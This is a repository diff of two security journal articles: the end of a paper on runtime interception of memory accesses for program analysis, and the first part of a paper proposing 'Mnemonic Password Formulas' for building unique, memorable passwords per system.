it. Using these simple concepts, it is possible to build a dependency graph
|
||||
that shows how areas of code become dependent on one another in terms of a
|
||||
reader/writer relationship. This dependency graph would be dynamic and would
|
||||
change as a program executes just the same as the data propagation within an
|
||||
application would change.
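The reader/writer relationship described above can be sketched as follows. This is a minimal Python illustration and not the author's DBI-based implementation; the class name DependencyTracker and the use of string labels for code locations are assumptions made for the example.

```python
from collections import defaultdict


class DependencyTracker:
    """Track which code locations depend on which writers, per address."""

    def __init__(self):
        self.last_writer = {}          # address -> code location of last write
        self.edges = defaultdict(set)  # reader location -> writer locations

    def on_write(self, code_loc, address):
        # A new write displaces any earlier writer's claim on the address.
        self.last_writer[address] = code_loc

    def on_read(self, code_loc, address):
        # A read depends on whichever location last wrote the address.
        writer = self.last_writer.get(address)
        if writer is not None:
            self.edges[code_loc].add(writer)
```

Feeding the tracker the stream of intercepted accesses yields a graph whose edges change over time, which mirrors the dynamic nature of data propagation noted above.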
|
||||
|
||||
At this point in time, the author has developed a very simple implementation
|
||||
based on the DBI strategy outlined in this paper. The current implementation
|
||||
is in need of further refinement, but it is capable of showing reader/writer
|
||||
relationships as the program executes. This area is ripe for future research.
|
||||
|
||||
3.2) Memory Access Isolation
|
||||
|
||||
From a visualization standpoint, it might be interesting to be able to show
|
||||
with what degrees of code-level isolation different regions of memory are
|
||||
accessed. For example, being able to show what areas of code touch individual
|
||||
heap allocations could provide interesting insight into the containment model
|
||||
of an application that is being analyzed. This type of analysis might be able
|
||||
to show how well designed the application is by inferring code quality based
|
||||
on the average number of areas of code that make direct reference to unique
|
||||
heap allocations. Since this concept is a bit abstract, it might make sense
|
||||
to discuss a more concrete example.
|
||||
|
||||
One example might involve an object-oriented C++ application that contains
|
||||
multiple classes such as Circle, Shape, Triangle, and so on. In the first
|
||||
design, the application allows classes to directly access the attributes of
|
||||
instances. In the second design, the application forces classes to reference
|
||||
attributes through public getters and setters. Using memory access behavior
|
||||
to identify code-level isolation, the first design might be seen as a poor
|
||||
design due to the fact that there will be many code locations where unique
|
||||
heap allocations (class instances) have the contents of their memory accessed
|
||||
directly. The second design, on the other hand, might be seen as a more
|
||||
robust design due to the fact that the unique heap allocations would be
|
||||
accessed by fewer places (the getters and setters).
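One way to put a number on this comparison is to average, over all heap allocations, the count of distinct code locations that touch each one. The Python sketch below assumes the access log has already been reduced to (code location, allocation) pairs; the function name and the sample labels are hypothetical.

```python
from collections import defaultdict


def average_accessors(accesses):
    """Average number of distinct code locations touching each allocation.

    accesses: iterable of (code_location, allocation_id) pairs.
    """
    touching = defaultdict(set)
    for code_loc, alloc in accesses:
        touching[alloc].add(code_loc)
    if not touching:
        return 0.0
    return sum(len(locs) for locs in touching.values()) / len(touching)
```

Under this metric the first design would tend to score higher (more locations per allocation) than the second, subject to the inlining caveat discussed below.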
|
||||
|
||||
It may actually be the case that there's no way to draw a meaningful
|
||||
conclusion by analyzing code-level isolation of memory accesses. One specific
|
||||
case that was raised to the author involved how the use of inlining or
|
||||
aggressive compiler optimizations might incorrectly indicate a poor design.
|
||||
Even though this is likely true, there may be some knowledge that can be
|
||||
obtained by researching this further. The author is not presently aware of an
|
||||
implementation of this concept but would love to be made aware if one exists.
|
||||
|
||||
3.3) Thread Data Consistency
|
||||
|
||||
Programmers familiar with the pains of thread deadlocks and thread-related
|
||||
memory corruption should be well aware of how tedious these problems can be to
|
||||
debug. By analyzing memory access behavior in conjunction with some
|
||||
additional variables, it may be possible to make determinations as to whether
|
||||
or not a memory operation is being made in a thread safe manner. At this
|
||||
point, the author has not defined a formal approach that could be taken to
|
||||
achieve this, but a few rough ideas have been identified.
|
||||
|
||||
The basic idea behind this approach would be to combine memory access behavior
|
||||
with information about the thread that the access occurred in and the set of
|
||||
locks that were acquired when the memory access occurred. Determining which
|
||||
locks are held can be as simple as inserting instrumentation code into the
|
||||
routines that are used to acquire and release locks at runtime. When a lock
|
||||
is acquired, it can be pushed onto a thread-specific stack. When the lock is
|
||||
released, it can be removed. The nice thing about representing locks as a
|
||||
stack is that in almost every situation, locks should be acquired and released
|
||||
in symmetric order. Acquiring and releasing locks asymmetrically can quickly
|
||||
lead to deadlocks and therefore can be flagged as problematic.
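The per-thread lock stack can be sketched as follows. This is a Python model of the bookkeeping only; in practice the on_acquire and on_release hooks (hypothetical names) would be called from instrumentation inserted into the real lock routines.

```python
from collections import defaultdict


class LockTracker:
    """Maintain a stack of held locks per thread and flag asymmetric releases."""

    def __init__(self):
        self.stacks = defaultdict(list)  # thread id -> stack of held locks
        self.warnings = []               # (thread id, lock) released out of order

    def on_acquire(self, thread_id, lock):
        self.stacks[thread_id].append(lock)

    def on_release(self, thread_id, lock):
        stack = self.stacks[thread_id]
        if stack and stack[-1] == lock:
            stack.pop()  # symmetric release: most recently acquired lock
            return
        # Released out of order (or never acquired): flag it as problematic.
        self.warnings.append((thread_id, lock))
        if lock in stack:
            stack.remove(lock)

    def held(self, thread_id):
        """Set of locks the thread currently holds."""
        return frozenset(self.stacks[thread_id])
```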
|
||||
|
||||
Determining data consistency is quite a bit trickier, however. An analysis
|
||||
library would need some means of historically tracking read and write access
|
||||
to different locations in memory. Still, determining what might be a data
|
||||
consistency issue from this historical data is challenging. One example of a
|
||||
potential data consistency issue might be if two writes occur to a location in
|
||||
memory from separate threads without a common lock being acquired between the
|
||||
two threads. This isn't guaranteed to be problematic, but it is at the very
|
||||
least indicative of a potential problem. Indeed, it's likely that many
|
||||
other types of data consistency examples exist that may be possible to capture
|
||||
in relation to memory access, thread context, and lock ownership.
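The two-writes example above can be expressed as a check over a historical write log. The sketch below is a Python illustration under the assumption that each logged write carries the thread id and the set of locks held at the time; the function name and log layout are hypothetical. As noted, a hit is only an indication of a potential problem.

```python
def find_unsynchronized_writes(write_log):
    """Flag consecutive writes to one address from different threads
    that share no common lock.

    write_log: list of (address, thread_id, locks_held) in program order.
    Returns a list of (address, earlier_thread, later_thread).
    """
    last_write = {}  # address -> (thread_id, locks_held) of the previous write
    suspects = []
    for address, thread_id, locks in write_log:
        locks = frozenset(locks)
        prev = last_write.get(address)
        if prev is not None:
            prev_thread, prev_locks = prev
            # Different threads and an empty lock intersection: suspicious.
            if prev_thread != thread_id and not (prev_locks & locks):
                suspects.append((address, prev_thread, thread_id))
        last_write[address] = (thread_id, locks)
    return suspects
```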
|
||||
|
||||
Even if this concept can be made to work, the very fact that it would be a
|
||||
runtime solution isn't a great thing. It may be the case that code paths that
|
||||
lead to thread deadlocks or thread-related corruption are only executed rarely
|
||||
and are hard to coax out. Regardless, the author feels like this represents
|
||||
an interesting area of future research.
|
||||
|
||||
4) Previous Work
|
||||
|
||||
The ideas described in this paper benefit greatly from the concepts
|
||||
demonstrated in previous works. The memory mirroring concept described in 2.2
|
||||
draws heavily from the PaX team's work relating to their VMA mirroring and
|
||||
software-based non-executable page implementations[8]. Oded Horovitz provided an
|
||||
implementation of the paging approach for Windows and applied it to
|
||||
application security[4]. In addition, there have been other examples that use
|
||||
concepts similar to those described by PaX to achieve additional results, such
|
||||
as OllyBone, ShadowWalker, and others[10, 9]. The use of DBI in 2.1 for
|
||||
memory analysis is facilitated by the excellent work that has gone into
|
||||
DynamoRIO, Valgrind, and indeed all other DBI frameworks[3, 11].
|
||||
|
||||
It should be noted that if one is strictly interested in monitoring writes to
|
||||
a memory region, Windows provides a built-in feature known as a write watch.
|
||||
When allocating a region with VirtualAlloc, the MEM_WRITE_WATCH flag can be set.
|
||||
This flag tells the kernel to track writes that occur to the region. These
|
||||
writes can be queried at a later point in time using GetWriteWatch[6].
|
||||
|
||||
It is also possible to use guard pages and other forms of page protection,
|
||||
such as PAGE_NOACCESS, to intercept memory access to a page in user-mode.
|
||||
Pedram Amini's PyDbg supports the concept of memory breakpoints which are
|
||||
implemented using guard pages[12]. This type of approach has two limitations
|
||||
that are worth noting. The first limitation involves an inability to pass
|
||||
addresses to kernel-mode that have had a memory breakpoint set on them (either
|
||||
guard page or PAGE_NOACCESS). If this occurs it can lead to unexpected
|
||||
behavior, such as by causing a system call to fail when referencing the
|
||||
user-mode address. This would not trigger an exception in user-mode.
|
||||
Instead, the system call would simply return STATUS_ACCESS_VIOLATION. As a
|
||||
result, an application might crash or otherwise behave improperly. The second
|
||||
limitation is that there may be consequences in multi-threaded environments
|
||||
where memory accesses are missed.
|
||||
|
||||
5) Conclusion
|
||||
|
||||
The ability to analyze the memory access behavior of an application at runtime
|
||||
can provide additional insight into how an application works. This insight
|
||||
might include learning more about how data propagates, deducing the code-level
|
||||
isolation of memory references, identifying potential thread safety issues,
|
||||
and so on. This paper has described three strategies that can be used to
|
||||
intercept memory accesses within an application at runtime.
|
||||
|
||||
The first approach relies on Dynamic Binary Instrumentation (DBI) to inject
|
||||
instrumentation code before instructions that access memory locations. This
|
||||
instrumentation code is then capable of obtaining information about the
|
||||
address being referenced when instructions are executed.
|
||||
|
||||
The second approach relies on hardware paging features supported by the x86
|
||||
and x64 architectures to intercept memory accesses. This works by restricting
|
||||
access to a virtual address range to kernel-mode access. When an application
|
||||
attempts to reference a virtual address that has been marked as such, an
|
||||
exception is generated that is then passed to the user-mode exception
|
||||
dispatcher. A custom exception handler can then inspect the exception and
|
||||
take the steps necessary to allow execution to continue gracefully after
|
||||
having tracked the memory access.
|
||||
|
||||
The third approach uses the segmentation feature of the x86 architecture to
|
||||
intercept memory accesses. It does this by loading the DS and ES segment
|
||||
registers with the null selector. This has the effect of causing instructions
|
||||
which implicitly use these registers to generate a general protection fault
|
||||
when referencing memory. This fault results in an access violation exception
|
||||
being generated that can be handled in much the same way as the hardware
|
||||
paging approach.
|
||||
|
||||
It is hoped that these strategies might be useful to future research which
|
||||
could benefit from collecting memory access information.
|
||||
|
||||
References
|
||||
|
||||
[1] AMD. AMD64 Architecture Programmer's Manual: Volume 2 System Programming.
|
||||
http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf; accessed 5/2/2007.
|
||||
|
||||
[2] Bala, Duesterwald, Banerjia. Transparent Dynamic Optimization.
|
||||
http://www.hpl.hp.com/techreports/1999/HPL-1999-77.pdf; accessed 5/2/2007.
|
||||
|
||||
[3] Hewlett-Packard, MIT. DynamoRIO.
|
||||
http://www.cag.lcs.mit.edu/dynamorio/; accessed 4/30/2007.
|
||||
|
||||
[4] Horovitz, Oded. Memory Access Detection.
|
||||
http://cansecwest.com/core03/mad.zip; accessed 5/7/2007.
|
||||
|
||||
[5] Intel. Intel Architecture Software Developer's Manual Volume 3: System Programming.
|
||||
http://download.intel.com/design/PentiumII/manuals/24319202.pdf; accessed 5/1/2007.
|
||||
|
||||
[6] Microsoft Corporation. GetWriteWatch.
|
||||
http://msdn2.microsoft.com/en-us/library/aa366573.aspx; accessed 5/5/2007.
|
||||
|
||||
[7] Nethercote, Nicholas. Dynamic Binary Analysis and Instrumentation.
|
||||
http://valgrind.org/docs/phd2004.pdf; accessed 5/2/2007.
|
||||
|
||||
[8] PaX Team. PAGEEXEC.
|
||||
http://pax.grsecurity.net/docs/pageexec.txt; accessed 5/1/2007.
|
||||
|
||||
[9] Sparks, Butler. Shadow Walker: Raising the Bar for Rootkit Detection.
|
||||
https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf; accessed 5/3/2007.
|
||||
|
||||
[10] Stewart, Joe. Ollybone.
|
||||
http://www.joestewart.org/ollybone/; accessed 5/3/2007.
|
||||
|
||||
[11] Valgrind. Valgrind.
|
||||
http://valgrind.org/; accessed 4/30/2007.
|
||||
|
||||
[12] Amini, Pedram. PaiMei.
|
||||
http://pedram.redhive.com/PaiMei/docs/; accessed 5/10/2007.
|
491
uninformed/7.3.txt
Normal file
|
@ -0,0 +1,491 @@
|
|||
Mnemonic Password Formulas
|
||||
I)ruid, C²ISSP
|
||||
druid@caughq.org
|
||||
http://druid.caughq.org
|
||||
5/2007
|
||||
|
||||
Abstract
|
||||
|
||||
The current information technology landscape is cluttered with a large
|
||||
number of information systems that each have their own individual
|
||||
authentication schemes. Even with single sign-on and multi-system
|
||||
authentication methods, systems within disparate management domains
|
||||
are likely to be utilized by users of various levels of involvement
|
||||
within the landscape as a whole. Due to this complexity and the
|
||||
abundance of authentication requirements, many users are required to
|
||||
manage numerous credentials across various systems. This has given rise to
|
||||
many different insecurities relating to the selection and management of
|
||||
passwords. This paper details a subset of issues facing users and managers of
|
||||
authentication systems involving passwords, discusses current approaches to
|
||||
mitigating those issues, and finally introduces a new method for password
|
||||
management and recall termed Mnemonic Password Formulas.
|
||||
|
||||
1) The Problem
|
||||
|
||||
1.1) Many Authentication Systems
|
||||
|
||||
The current information systems landscape is cluttered with individual
|
||||
authentication systems. Even though many systems existing in a distinct
|
||||
management domain utilize single sign-on as well as multi-system
|
||||
authentication mechanisms, multiple systems within disparate management
|
||||
domains are likely to be utilized regularly by users. Even users at the most
|
||||
casual level of involvement in information systems can be expected to
|
||||
interface with half a dozen or more individual authentication systems within
|
||||
a single day. On-line banking systems, corporate intranet web and database
|
||||
systems, e-mail systems, and social networking web sites are a few of the many
|
||||
systems that may require their own method of user authentication.
|
||||
|
||||
Due to the abundance of authentication systems, many end users are required to
|
||||
manage the large numbers of passwords needed to authenticate with these
|
||||
various systems. This issue has given rise to many common insecurities related
|
||||
to selection and management of passwords.
|
||||
|
||||
In addition to the prevalence of insecurities in password selection and
|
||||
management, advances in authentication and cryptography assemblages have
|
||||
instigated a shift in attack methodologies against authentication systems.
|
||||
While recent headway in computing power has made shorter passwords such as
|
||||
six characters or less (regardless of the complexity of their content)
|
||||
vulnerable to cracking by brute force[4], common attack methodologies are moving
|
||||
away from cryptanalytic and brute force methods against the password storage
|
||||
or authentication system in favor of intelligent guessing of passwords. This
|
||||
intelligent guessing might involve optimized dictionary attacks and
|
||||
user context guesses, attacks against other credentials required by the
|
||||
authentication system such as key-cards and password token devices, and
|
||||
attacks against the interaction between the user and the systems themselves.
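To give a sense of scale for the brute force claim above, the number of candidate passwords of up to six characters can be counted directly. The short Python sketch below assumes an alphabet of the 95 printable ASCII characters, which is an assumption of this example and not a figure from the cited research.

```python
PRINTABLE_ASCII = 95  # printable ASCII characters, space included (assumed alphabet)


def keyspace(alphabet_size, max_length):
    """Count every password of length 1..max_length over the alphabet."""
    return sum(alphabet_size ** n for n in range(1, max_length + 1))


# All passwords of six characters or less, regardless of content.
six_or_less = keyspace(PRINTABLE_ASCII, 6)
```

Each additional character multiplies the search space by the alphabet size, which is why length matters more than content against exhaustive search.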
|
||||
|
||||
Due to all of the aforementioned factors, the user's password is commonly the
|
||||
weakest link in any given authentication system.
|
||||
|
||||
1.2) Managing Multiple Passwords
|
||||
|
||||
Two of the largest problems with password authentication relate directly to
|
||||
the user and how the user manages passwords. First, when users are not allowed
|
||||
to write down their passwords, they generally will choose easy to remember
|
||||
passwords which are usually much easier to crack than complex passwords. In
|
||||
addition to choosing weaker passwords, users are more likely to re-use
|
||||
passwords across multiple authentication systems.
|
||||
|
||||
Users have an inevitably difficult time memorizing assigned random
|
||||
passwords[4] and passwords of a mandated higher level of complexity chosen
|
||||
by themselves. When allowed, they may write down their passwords in an insecure
|
||||
location such as a post-it note stuck to their computer monitor or on a note
|
||||
pad in their desk. Alternatively, they may store passwords securely, such as
|
||||
a password encrypted file within a PDA. However, a user could just as easily
|
||||
lose access to the password store. The user may forget the password to the
|
||||
encrypted file, or the PDA could be lost or stolen. In this situation, the end
|
||||
result would require some administrative interaction in the form of issuing a
|
||||
password reset.
|
||||
|
||||
1.3) Poor Password Selection
|
||||
|
||||
When left to their own devices, users generally do not choose complex
|
||||
passwords[4] and tend to choose easy to crack dictionary words because they
|
||||
are easy to remember. Occasionally an attempt will be made at complexity by
|
||||
concatenating two words together or adding a number. In many cases, the word
|
||||
or words chosen will also be related to, or within the context of, the user
|
||||
themselves. This context might include things like a pet's name, phone
|
||||
number, or a birth date.
|
||||
|
||||
These types of passwords require much less effort to crack than a brute-force
|
||||
trial of the entire range of potential passwords. By using an optimized
|
||||
dictionary attack method, common words and phrases are tried first which
|
||||
usually leads to success. Due to the high success rate of this method, most
|
||||
modern attacks on authentication systems target guessing the password first
|
||||
before attempting to brute-force the password or launch an in-depth attack on
|
||||
the authentication system itself.
|
||||
|
||||
1.4) Failing Stupid
|
||||
|
||||
When a user cannot remember their password, likely because they have too many
|
||||
passwords to remember or the password was forced to be too complex for them to
|
||||
remember, many authentication systems provide a mechanism that the author has
|
||||
termed ``failing stupid.''
|
||||
|
||||
When the user ``fails stupid,'' they are asked a reminder question which is
|
||||
usually extremely easy for them to answer. If answered correctly, users are
|
||||
presented with an option to either reset their password, have it e-mailed to
|
||||
them, or perform some other password recovery method. When this type of
|
||||
recovery method is available, it effectively reduces the security of the
|
||||
authentication system from the strength of the password to the strength of a
|
||||
simple question. The answer to this question might even be obtainable through
|
||||
public information.
|
||||
|
||||
1.4.1) Case Study: Paris Hilton Screwed by Dog
|
||||
|
||||
A well publicized user context attack[2] was recently executed against the
|
||||
Hollywood celebrity Paris Hilton in which her cellular phone was compromised.
|
||||
The account password recovery question that she selected for use with her
|
||||
cellular provider's web site was "What is your favorite pet's name?" Many fans
|
||||
can most likely recollect from memory the answer to this question, not to
|
||||
mention fan web sites, message boards, and tabloids that likely have this
|
||||
information available to anyone that wishes to gather it. The attacker simply
|
||||
"failed stupid" and reset Hilton's online account password which then allowed
|
||||
access to her cellular device and its data.
|
||||
|
||||
2) Existing Approaches
|
||||
|
||||
2.1) Write Down Passwords
|
||||
|
||||
During the AusCERT 2005 information security conference, Jesper Johansson,
|
||||
Senior Program Manager for Security Policy at Microsoft, suggested[1] reversing
|
||||
decades of information security best practice of not writing down passwords.
|
||||
He claimed that the method of password security wherein users are prohibited
|
||||
from writing down passwords is absolutely wrong. Instead, he advocated
|
||||
allowing users to write down their passwords. The reasoning behind his claim
|
||||
is an attempt at solving one of the problems mentioned previously: when users
|
||||
are not allowed to write down their passwords they tend to choose easy to
|
||||
remember (and therefore easy to crack) passwords. Johansson believes that
|
||||
allowing users to write down their passwords will result in more complex
|
||||
passwords being used.
|
||||
|
||||
While Mr. Johansson correctly identifies some of the problems of password
|
||||
security, his approach to solving these conundrums is not only short-sighted,
|
||||
but also noncomprehensive. His solution solves users having to remember
|
||||
multiple complex passwords, but also creates the aforementioned insecure
|
||||
scenarios regarding written passwords which are inherently physically less
|
||||
secure and prone to require administrative reset due to loss.
|
||||
|
||||
2.2) Mnemonic Passwords
|
||||
|
||||
A mnemonic password is a password that is easily recalled by utilizing a
|
||||
memory trick such as constructing passwords from the first letters of easily
|
||||
remembered phrases, poems, or song lyrics. An example includes using the
|
||||
first letters of each word in a phrase, such as: "Jack and Jill went up the
|
||||
hill," which results in the password "JaJwuth". For mnemonic passwords to be
|
||||
useful, the phrase must be easy for the user to remember.
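The first-letter construction can be written as a one-line transformation. This is a minimal Python sketch; the function name mnemonic_password is hypothetical.

```python
def mnemonic_password(phrase):
    """Build a password from the first character of each word in a phrase."""
    return "".join(word[0] for word in phrase.split())


password = mnemonic_password("Jack and Jill went up the hill,")
```

Because only the first character of each word is taken, trailing punctuation in the phrase is dropped and the original capitalization is preserved.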
|
||||
|
||||
Previous research has shown[4] that passwords built from phrase recollection like
|
||||
the example above yield passwords with complexity akin to true random
|
||||
character distribution. Mnemonic passwords share a weakness with regular
|
||||
passwords in that users may reuse them across multiple authentication systems.
|
||||
Such passwords are also commonly created using well known selections of text
|
||||
from famous literature or music lyrics. Password cracking dictionaries have
|
||||
been developed that contain many of these common mnemonics.
|
||||
|
||||
2.3) More Secure Mnemonic Passwords
|
||||
|
||||
More Secure Mnemonic Passwords[1] (MSMPs) are passwords that are derived from
|
||||
simple passwords which the user will remember with ease; however, they use
|
||||
mnemonic substitutions to give the password a more complex quality.
|
||||
``Leet-speaking'' a password is a simple example of this technique. For
|
||||
example, converting the passwords ``beerbash'' and ``catwoman'' into
|
||||
leet-speak would result in the passwords ``b33rb4sh'' and ``c@w0m4n'',
|
||||
respectively.
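The substitutions used in these two examples can be sketched as follows. The rule set here (the pair "at" becomes "@", then e, a, and o become 3, 4, and 0) is inferred from the examples above and is only one of many possible leet-speak mappings; the function name is hypothetical.

```python
def leet_speak(password):
    """Apply a small, fixed set of leet-speak substitutions."""
    # Replace the letter pair "at" first so it is not split by the
    # single-character substitutions that follow.
    result = password.replace("at", "@")
    return result.translate(str.maketrans({"e": "3", "a": "4", "o": "0"}))
```

A fixed mapping like this is exactly what the permutation-aware cracking dictionaries mentioned below take advantage of.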
|
||||
|
||||
A unique problem of MSMPs is that not all passwords can be easily transformed
|
||||
which limits either the choice of available passwords or the password's
|
||||
seemingly complex quality. MSMPs also rely on permutations of an underlying
|
||||
dictionary word or set of words which are easy to remember. Various cracking
|
||||
dictionaries have been developed to attack specific methods of permutations
|
||||
such as the "leet-speak" method mentioned above. As with mnemonic passwords,
|
||||
these passwords might be reused across multiple authentication systems.
|
||||
|
||||
2.4) Pass Phrases
|
||||
|
||||
Pass phrases[3] are essentially what is used as the root of a mnemonic password.
|
||||
They are easier to remember and much longer which results in a password being
|
||||
much more resilient to attack by brute force. Pass phrases tend to be much
|
||||
more complex due to the use of upper and lower case characters, white-space
|
||||
characters, as well as special characters like punctuation and numbers.
|
||||
|
||||
However, pass phrases have their own sets of problems. Many authentication
|
||||
systems do not support lengthy authentication tokens, thus resulting in pass
|
||||
phrases that are not consistently usable. Like the aforementioned methods,
|
||||
the same pass phrase may be reused across multiple authentication systems.
|
||||
|
||||
3) Mnemonic Password Formulas
|
||||
|
||||
3.1) Definition
|
||||
|
||||
A Mnemonic Password Formula, or MPF, is a memory technique utilizing a
|
||||
predefined, memorized formula to construct a password on the fly from various
|
||||
context information that the user has available.
|
||||
|
||||
3.2) Properties
|
||||
|
||||
Given a well designed MPF, the resultant password should have the following
|
||||
properties:
|
||||
|
||||
- A seemingly random string of characters
|
||||
- Long and very complex, therefore difficult to crack via brute force
|
||||
- Easy to reconstruct by a user with knowledge of only the formula,
|
||||
themselves, and the target authentication system
|
||||
- Unique for each user, class of access, and authenticating system
|
||||
|
||||
3.3) Formula Design
|
||||
|
||||
3.3.1) Syntax
|
||||
|
||||
For the purposes of this paper, the following formula syntax will be used:
|
||||
|
||||
- <X> : An element, where <X> is meant to be entirely replaced by something known as described by X.
|
||||
- | : When used within an element's angle brackets (< and >), represents an OR value choice.
|
||||
- All other characters are literal.
|
||||
|
||||
3.3.2) A Simple MPF
|
||||
|
||||
The following simple formula should be sufficient to demonstrate the MPF
|
||||
concept. Given the authenticating user and the corresponding authenticating
|
||||
system, a formula like that shown in the following example could be
|
||||
constructed. This example formula contains two elements: the user and
|
||||
the target system identified either by hostname or the last octet
|
||||
of the IP address.
|
||||
|
||||
<user>!<hostname|lastoctet>
|
||||
|
||||
The above MPF would yield such passwords as:
|
||||
|
||||
- "druid!neo" for user druid at system neo.jpl.nasa.gov
|
||||
- "intropy!intropy" for user intropy at system intropy.net
|
||||
- "thegnome!nmrc" for user thegnome at system nmrc.org
|
||||
- "druid!33" for user druid at system 10.0.0.33
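The simple formula can be expressed as a short function. This Python sketch assumes the system is given either as a dotted hostname or as a dotted-quad IPv4 address; the function name simple_mpf is hypothetical.

```python
import ipaddress


def simple_mpf(user, system):
    """Evaluate <user>!<hostname|lastoctet> for a user and target system."""
    try:
        ipaddress.IPv4Address(system)
        element = system.split(".")[-1]  # IP address: use the last octet
    except ValueError:
        element = system.split(".")[0]   # name: use the hostname label
    return f"{user}!{element}"
```

In practice the formula is meant to be evaluated in the user's head; the code only makes the rule unambiguous.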
|
||||
|
||||
This simple MPF schema creates fairly long, easy to remember, passwords that
|
||||
contain a special character. However, it does not yield very complex
|
||||
passwords. A diligent attacker may include the target user and hostname as
|
||||
some of the first combinations of dictionary words used in a brute force
|
||||
attack against the password. Due to the fact that only the hostname or last
|
||||
octet of the IP address is used as a component of the schema, passwords may
|
||||
not be unique per system. If the same user has an account on two different web
|
||||
servers, both with hostname "www", or two different servers with the same last
|
||||
address octet value within two different sub-nets, the resultant passwords
|
||||
will be identical. Finally, the passwords yielded are variable in length and
|
||||
may not comply with a given system's password length policies.
|
||||
|
||||
3.3.3) A More Complex MPF
|
||||
|
||||
By modifying the simple MPF above, complexity can be improved. Given the
|
||||
authenticating user and the authenticating system, an MPF with the following
|
||||
components can be constructed:
|
||||
|
||||
<u>!<h|n>.<d,d,...|n,n,...>
|
||||
|
||||
The more complex MPF contains three elements: <u> represents the first letter
|
||||
of the username, <h|n> represents the first letter of the hostname or first
|
||||
number of the first address octet, and <d,d,...|n,n,...> represents the first
|
||||
letters of the remaining domain name parts or first numbers of the remaining
|
||||
address octets, concatenated together. This MPF also contains another special
|
||||
character in addition to the exclamation mark, the period between the second
|
||||
and third element.
|
||||
|
||||
The above MPF would yield such passwords as:
|
||||
|
||||
- "d!n.jng" for user druid at system neo.jpl.nasa.gov
|
||||
- "i!i.n" for user intropy at system intropy.net
|
||||
- "t!n.o" for user thegnome at system nmrc.org
|
||||
- "d!1.003" for user druid at system 10.0.0.33
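
As a rough sketch, the same rule can be written so that hostnames and IPv4
addresses are handled identically, since both are dot-separated and only the
first character of each part is used. The function name is hypothetical.

```python
def complex_mpf(user, system):
    """Apply <u>!<h|n>.<d,d,...|n,n,...> to a hostname or IPv4 address."""
    parts = system.split(".")
    first, rest = parts[0], parts[1:]
    # First character of the user, then of the first part, then of each
    # remaining part concatenated together.
    return f"{user[0]}!{first[0]}." + "".join(part[0] for part in rest)


if __name__ == "__main__":
    print(complex_mpf("druid", "neo.jpl.nasa.gov"))
    print(complex_mpf("druid", "10.0.0.33"))
```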
|
||||
|
||||
The modified MPF contains two special characters which yields more complex
|
||||
passwords; however, the passwords are still variable length and may not comply
|
||||
with the authenticating system's password length policies. The example MPF is
|
||||
also increasing in complexity and may not be easily remembered.
|
||||
|
||||
3.3.4) Design Goals
|
||||
|
||||
The ideal MPF should meet as many of the following design goals as possible:
|
||||
|
||||
- Contain enough elements and literals to always yield a minimum password
|
||||
length
|
||||
- Contain enough complex elements and literals such as capital letters and
|
||||
special characters to yield a complex password
|
||||
- Elements must be unique enough to yield a unique password per
|
||||
authenticating system
|
||||
- Must be easily remembered by the user
|
||||
|
||||
3.3.5) Layered Mnemonics
|
||||
|
||||
Due to the fact that MPFs can become fairly complex while attempting to meet
|
||||
the first three design goals listed above, a second layer of mnemonic
|
||||
properties can be applied to the MPF. The MPF, by definition, is a mnemonic
|
||||
technique due to its property of allowing the user to reconstruct the password
|
||||
for any given system by remembering only the MPF and having contextual
|
||||
knowledge of themselves and the system. Other mnemonic techniques can be
|
||||
applied to help remember the MPF itself. This second layer of mnemonics may
|
||||
also be tailored to the user of the MPF.
|
||||
|
||||
Given the authenticating user and the authenticating system, an adequately
|
||||
complex, long, and easy to remember MPF like the following could be
|
||||
constructed:
|
||||
|
||||
<u>@<h|n>.<d|n>;
|
||||
|
||||
This MPF contains three elements: <u> represents the first letter of the
|
||||
username, <h|n> represents the first letter of the hostname or first number of
|
||||
the first address octet, and <d|n> represents the last letter of the domain
|
||||
name suffix or last number of the last address octet. The modified MPF also
|
||||
contains a third special character in addition to the at sign and
|
||||
period: the semicolon after the final element.
|
||||
|
||||
The above MPF would yield such passwords as:
|
||||
|
||||
- "d@n.v;" for user druid at system neo.jpl.nasa.gov
|
||||
- "i@i.t;" for user intropy at system intropy.net
|
||||
- "t@n.g;" for user thegnome at system nmrc.org
|
||||
- "d@1.3;" for user druid at 10.0.0.33
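
A minimal sketch of this email-style formula follows. The function name is
hypothetical; the logic simply takes the first character of the user, the
first character of the first dotted part, and the last character of the last
dotted part, then appends the literal semicolon.

```python
def email_style_mpf(user, system):
    """Apply <u>@<h|n>.<d|n>; to a hostname or IPv4 address."""
    parts = system.split(".")
    head = parts[0][0]    # first letter of hostname / first digit of first octet
    tail = parts[-1][-1]  # last letter of domain suffix / last digit of last octet
    return f"{user[0]}@{head}.{tail};"


if __name__ == "__main__":
    print(email_style_mpf("druid", "neo.jpl.nasa.gov"))
    print(email_style_mpf("druid", "10.0.0.33"))
```

The output is always six characters long, which addresses the variable-length
problem of the earlier formulas at the cost of using less of the system name.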
|
||||
|
||||
Unlike the previously discussed MPFs, the one mentioned above employs a
|
||||
secondary mnemonic technique by reading in a natural way and is thus easier
|
||||
for a user to remember. The MPF can be read and remembered as ``user at host
|
||||
dot domain,'' which is equatable to the structural format of an email address.
|
||||
Also, a secondary mnemonic technique specific to the user of this MPF was used
|
||||
by appending the literal semicolon character. This MPF was designed by a C
|
||||
programmer who would naturally remember to terminate her passwords with
|
||||
semicolons.
|
||||
|
||||
3.3.6) Advanced Elements
|
||||
|
||||
MPFs can be made even more complex through use of various advanced elements.
|
||||
Unlike simple elements which are meant to be replaced entirely by some static
|
||||
value like a username, first letter of a username, or some part of the
|
||||
hostname, advanced elements such as repeating elements, variable elements, and
|
||||
rotating or incrementing elements can be used to vastly improve the MPF's
|
||||
output complexity. Note, however, that overuse of these types of elements may
|
||||
cause the MPF to not meet design goal number four by making the MPF too
|
||||
difficult for the user to remember.
|
||||
|
||||
- Repeating Elements
|
||||
|
||||
MPFs may yield longer passwords by repeating simple elements. For
|
||||
example, an element such as the first letter of the hostname may be
|
||||
used twice:
|
||||
|
||||
<u>@<h|n><h|n>.<d|n>;
|
||||
|
||||
Such repeating elements are not required to be sequential, and
|
||||
therefore may be inserted at any point within the MPF.
|
||||
|
||||
- Variable Elements
|
||||
|
||||
MPFs can yield more complex passwords by including variable elements. For
|
||||
example, the MPF designer can prepend the characters "p:" or "b:" to the
|
||||
beginning of the MPF to include an element indicating whether the target system
|
||||
is a personal or business system.
|
||||
|
||||
<p|b>:<u>@<h|n>.<d|n>;
|
||||
|
||||
To further expand this example, consider a user who performs system
|
||||
administration work for multiple entities. In this case the variable
|
||||
